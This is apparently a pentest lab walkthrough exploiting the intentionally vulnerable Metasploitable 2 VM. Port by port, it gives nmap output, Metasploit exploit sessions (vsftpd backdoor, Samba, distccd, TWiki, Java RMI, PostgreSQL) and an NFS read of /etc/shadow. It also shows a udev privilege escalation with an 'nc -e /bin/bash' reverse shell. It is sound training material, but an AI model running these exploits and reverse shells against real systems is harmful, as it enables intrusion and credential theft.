Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154.
Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans.
Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

nmap -p1-65535 -A 192.168.127.154 Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-03 21:33 EEST Nmap scan report for 192.168.127.154 Host is up (0.00047s latency). Not shown: 65505 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45+00:00 |_Not valid after: 2010-04-16T13:07:45+00:00 |_ssl-date: 2014-06-03T18:35:26+00:00; -1s from local time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 46385/tcp mountd | 100005 1,2,3 47809/udp mountd | 100021 1,3,4 47120/udp nlockmgr | 100021 1,3,4 53013/tcp nlockmgr | 100024 1 34130/tcp status |_ 100024 1 45305/udp status 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 46385/tcp mountd | 100005 1,2,3 47809/udp mountd | 100021 1,3,4 47120/udp nlockmgr | 100021 1,3,4 53013/tcp nlockmgr | 100024 1 34130/tcp status |_ 100024 1 45305/udp status 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: ConnectWithDatabase, SwitchToSSLAfterHandshake, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag | Status: Autocommit |_ Salt: (eFoz:O^m'yLR5Qw&RJ\ 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | servers: 1 | users: 1 | lservers: 0 | lusers: 1 | uptime: 0 days, 0:07:28 | source host: 7FA0EA81.B1DFC955.FFFA6D49.IP |_ source ident: nmap 6697/tcp open irc Unreal ircd 8009/tcp open ajp13? | ajp-auth: |_ ERROR: Failed to connect to AJP server | ajp-methods: |_ ERROR: Failed to connect to server 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) 34130/tcp open status 1 (RPC #100024) 46385/tcp open mountd 1-3 (RPC #100005) 50867/tcp open unknown 53013/tcp open nlockmgr 1-4 (RPC #100021) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 46385/tcp mountd | 100005 1,2,3 47809/udp mountd | 100021 1,3,4 47120/udp nlockmgr | 100021 1,3,4 53013/tcp nlockmgr | 100024 1 34130/tcp status |_ 100024 1 45305/udp status MAC Address: 00:0C:29:2E:6D:70 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2014-06-03T14:35:26-04:00 TRACEROUTE HOP RTT ADDRESS 1 0.47 ms 192.168.127.154 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 284.64 seconds

Ok, there are plenty of services just waiting for our attention. So let’s check each port and see what we get.

Port 21 vsftpd

There is an exploit available in Metasploit for the vsftpd version.

1 2 3 4 5 6 7 8

msf > search vsftpd Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution

The description from Rapid7 site:
VSFTPD v2.3.4 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Let’s leverage it and get a shell:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(vsftpd_234_backdoor) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/interact normal Unix Command, Interact with Established Connection msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact payload => cmd/unix/interact msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.127.154 yes The target address RPORT 21 yes The target port Payload options (cmd/unix/interact): Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Automatic msf exploit(vsftpd_234_backdoor) > exploit [*] Banner: 220 (vsFTPd 2.3.4) [*] USER: 331 Please specify the password. [+] Backdoor service has been spawned, handling... [+] UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2014-06-03 22:42:36 +0300 whoami root uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Aaand we own the machine! Now let’s move on.

Port 22 ssh

The OpenSSL package installed on the system is vulnerable to a bruteforce exploit due to a random number generator weakness. Here’s the overview and the CVE number:
CVE-2008-0166

OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable > numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.

I chose the following Ruby exploit:
http://www.exploit-db.com/exploits/5632/
Before running it, you have to download the precalculated vulnerable keys from:
http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 # for dsa keys
http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 # for rsa keys
Then I ran the script as follows:

1	ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/

You can consult the source for more information, basically this checks if the root account has a weak SSH key, testing each key in the directory where you placed the keys. Upon a hit, you will see something like this:

1 2 3

KEYFILE FOUND: 57c3115d77c56390332dc5c49978627a-5429

After finding the key, you can use it to log in as root via ssh:

1	ssh -l root -p 22 -i 57c3115d77c56390332dc5c49978627a-5429 192.168.127.154

Port 23 telnet

For this one I used an auxiliary module:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

msf > use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > show options Module options (auxiliary/scanner/telnet/telnet_version): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target address range or CIDR identifier RPORT 23 yes The target port THREADS 1 yes The number of concurrent threads TIMEOUT 30 yes Timeout for the Telnet probe USERNAME no The username to authenticate as msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154 msf auxiliary(telnet_version) > run [*] 192.168.127.154:23 TELNET _ _ _ _ _ _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login: [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

So now we know the credentials for the msfadmin account, and if you log in and play around you will find out that this accound has sudo privilege, so it’s possible to run commands as root.

Port 80 apache

Navigating to the root of the web server, we can see some vulnerable web applications, along with the msfadmin account details which we got earlier with telnet. I won’t go over the web applications here, because I am focusing on host based exploitation in this post. However, I found out that I could use Metasploit against one of them to get a shell, so I will detail that here.
The Nessus scan revealed that the TWiki web application is vulnerable to remote code execution. I found the following suitable exploit:
TWiki History TWikiUsers rev Parameter Command Execution

This module exploits a vulnerability in the history component of TWiki. By passing a ‘rev’ parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

msf > use exploit/unix/webapp/twiki_history msf exploit(twiki_history) > show options Module options (exploit/unix/webapp/twiki_history): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port URI /twiki/bin yes TWiki bin directory path VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf exploit(twiki_history) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(twiki_history) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(twiki_history) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ZeiYbclsufvu4LGM; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Successfully sent exploit request [*] Reading from socket B [*] B: "ZeiYbclsufvu4LGM\r\n" [*] Matching... [*] A is input... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo D0Yvs2n6TnTUDmPF; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2014-06-08 17:31:48 +0300 [*] Reading from socket B [*] B: "D0Yvs2n6TnTUDmPF\r\n" [*] Matching... [*] A is input... whoami www-data

This is a low privilege shell, but we can escalate to root via the udev exploit, as shown later.

Port 445 samba

First, I’ll use an auxiliary module to get the server’s version:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

msf > use auxiliary/scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(smb_version) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154 msf auxiliary(smb_version) > run [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

With that information in hand, we can now use a suitable exploit against the target:
Samba “username map script” Command Execution

This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

msf > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(usermap_script) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(usermap_script) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.127.154 yes The target address RPORT 139 yes The target port Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(usermap_script) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 msf exploit(usermap_script) > set RPORT 445 RPORT => 445 msf exploit(usermap_script) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo f8rjvIDZRdKBtu0F; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "f8rjvIDZRdKBtu0F\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2014-06-04 22:23:23 +0300 whoami root

Port 514 tcpwrapped

The nmap scan revealed the port is open but it’s tcpwrapped. Let’s first see what that means:

TCP Wrapper is a host-based networking access control list system, used to filter network access to Internet Protocol servers on (Unix- like) operating systems such as Linux or BSD. (Wikipedia)

So we can conclude the port is protected by TCP Wrapper. If we try to netcat to the port, we see this:

1 2 3

nc -vvn 192.168.127.154 514 (UNKNOWN) [192.168.127.154] 514 (shell) open

I ran a Nessus scan against the target, and according to the report, a critical vulnerability is present on this port:
rsh Unauthenticated Access (via finger Information)
Synopsis
It was possible to log on this machine without password.
Description
Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.
This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured.
Port
tcp/514
So all we have to do is log in via the remote shell program:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

rsh 192.168.127.154 Last login: Wed May 7 11:00:37 EDT 2014 from :0.0 on pts/0 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ You have mail. root@metasploitable:~#

Port 1099 java-rmi

Let’s continue our exploitation. Anything labeled Java is bound to be interesting from a security perspective :)
Searching for Java exploits yielded something interesting:
Java RMI Server Insecure Default Configuration Java Code Execution

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72

msf > use exploit/multi/misc/java_rmi_server msf exploit(java_rmi_server) > show options Module options (exploit/multi/misc/java_rmi_server): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 1099 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_rmi_server) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(java_rmi_server) > show options Module options (exploit/multi/misc/java_rmi_server): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.127.154 yes The target address RPORT 1099 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (java/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_rmi_server) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 msf exploit(java_rmi_server) > exploit [*] Started reverse handler on 192.168.127.159:4444 [*] Using URL: http://0.0.0.0:8080/oVUJAkfU [*] Local IP: http://192.168.127.159:8080/oVUJAkfU [*] Connected and sending request for http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar [*] 192.168.127.154 java_rmi_server - Replied to request for payload JAR [*] Sending stage (30355 bytes) to 192.168.127.154 [*] Meterpreter session 2 opened (192.168.127.159:4444 -> 192.168.127.154:36965) at 2014-06-04 22:42:17 +0300 [+] Target 192.168.127.154:1099 may be exploitable... [*] Server stopped. meterpreter > getuid Server username: root meterpreter >

Port 1524 shell

Well, not much to say here. There’s already a nice, cozy shell waiting for connections, so nothing extra needs to be done.

Port 2049 nfs

Let’s use the the showmount command to see the NFS server’s export list. This command displays mount information for an NFS server. The -e flag is for showing exports:

1 2 3 4 5

showmount -e 192.168.127.154 Export list for 192.168.127.154: / *

How nice! The root directory is shared. So, let’s mount it then:

1 2 3

mkdir /metafs # this will be the mount point mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking

Now we can read the passwords and everything else:

1 2 3 4 5

cat /metafs/etc/shadow root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7::: ..........etc..........

Port 3306 mysql

The Nessus scan that I ran against the target revealed the following:
MySQL Unpassworded Account Check
Synopsis
The remote database server can be accessed without a password.
Description
It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.
The ‘root’ account does not have a password. Here is the list of databases on the remote server : – information_schema – dvwa – metasploit – mysql – owasp10 – tikiwiki – tikiwiki195
Let’s see if we can indeed connect to the database as root without a password:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

mysql -u root -p -h 192.168.127.154 Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 7 Server version: 5.0.51a-3ubuntu5 (Ubuntu) Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql>

Now we can look inside the databases and get any data that might interest us.

Port 3632 distccd

distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. Metasploit has an exploit avaiable for this:
DistCC Daemon Command Execution

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > show options Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 3632 yes The target port Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(distcc_exec) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(distcc_exec) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(distcc_exec) > show options Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.127.154 yes The target address RPORT 3632 yes The target port Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(distcc_exec) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 msf exploit(distcc_exec) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo VhuwDGXAoBmUMNcg; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "VhuwDGXAoBmUMNcg\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2014-06-05 21:34:46 +0300 whoami daemon

So we have a low privilege account. Time for some local privilege escalation. I will use this exploit: http://www.exploit-db.com/exploits/8572/
Description
udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.
Usage
Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
The exploit will execute /tmp/run as root so throw whatever payload you want in there.
Ok, on the command line on the victim, I looked for netcat and fortunately, it’s installed:

1 2	whereis nc nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz

So I will compile the exploit and send it over netcat. I am on a 64 bit Kali and the target is 32 bit, so I compile it explicitly for 32 bit:

1 2	gcc -m32 8572.c -o 8572 nc -vv -l -p 5555 < 8572

From the victim, I go to the /tmp/ directory and grab the exploit from the attacking machine:

1	nc -v -n 192.168.127.159 5555 > 8572

Next, let’s look for the PID:

1	cat /proc/net/netlink

And the relevant line is:

1 2	sk Eth Pid Groups Rmem Wmem Dump Locks df8cc200 15 2767 00000001 0 0 00000000 2

Check that this is the correct PID by looking at the udev service:

1 2	ps aux | grep udev root 2768 0.0 0.1 2092 620 ? S<s 14:11 0:00 /sbin/udevd --daemon

It appears to be the right one (2768 – 1 = 2767)
Next, put some payload in /tmp/run, since that will be executed by the exploit. I will use netcat to connect to the atacker machine and give it a shell:

1 2	echo '#!/bin/bash' > /tmp/run echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run

On the attacker machine, listen on port 5555:

1	nc -v -l -p 5555

And on the victim machine, now that all is set up, I just make the exploit executable and run it:

1 2	chmod +x 8572 ./8572 2767

Now check our local netcat listener for the root shell:

1 2 3

nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539] whoami root

A bit on effort on that one, but all the more rewarding! Let’s move on.

Port 5432 postgresql

Since I already saw earlier that the mysql database wasn’t password protected, I will try a bruteforce auxiliary module to see if I can get in this one.
PostgreSQL Login Utility

This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

msf > use auxiliary/scanner/postgres/postgres_login msf auxiliary(postgres_login) > show options Module options (auxiliary/scanner/postgres/postgres_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE template1 yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line RETURN_ROWSET true no Set to true to see query result sets RHOSTS yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME postgres no A specific username to authenticate as USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154 msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf auxiliary(postgres_login) > run [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' [+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres' [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) [*] 192.168.127.154:5432 Postgres - Disconnected [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

So it’s possible to log in to this database like earlier with mysql, but I searched through Metasploit’s available exploits, and I stumbled upon one that can further the exploitation:
PostgreSQL for Linux Payload Execution

On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries’s om there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object’s constructor, it does not need to conform to specific Postgres API versions.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

msf > use exploit/linux/postgres/postgres_payload msf exploit(postgres_payload) > show options Module options (exploit/linux/postgres/postgres_payload): Name Current Setting Required Description ---- --------------- -------- ----------- DATABASE template1 yes The database to authenticate against PASSWORD no The password for the specified username. Leave blank for a random password. RHOST yes The target address RPORT 5432 yes The target port USERNAME postgres yes The username to authenticate as VERBOSE false no Enable verbose output Exploit target: Id Name -- ---- 0 Linux x86 msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp msf exploit(postgres_payload) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 set PASSWORD postgres PASSWORD => postgres msf exploit(postgres_payload) > exploit [*] Started reverse handler on 192.168.127.159:4444 [*] 192.168.127.154:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) [*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically [*] Transmitting intermediate stager for over-sized stage...(100 bytes) [*] Sending stage (1228800 bytes) to 192.168.127.154 [*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2014-06-06 22:49:17 +0300

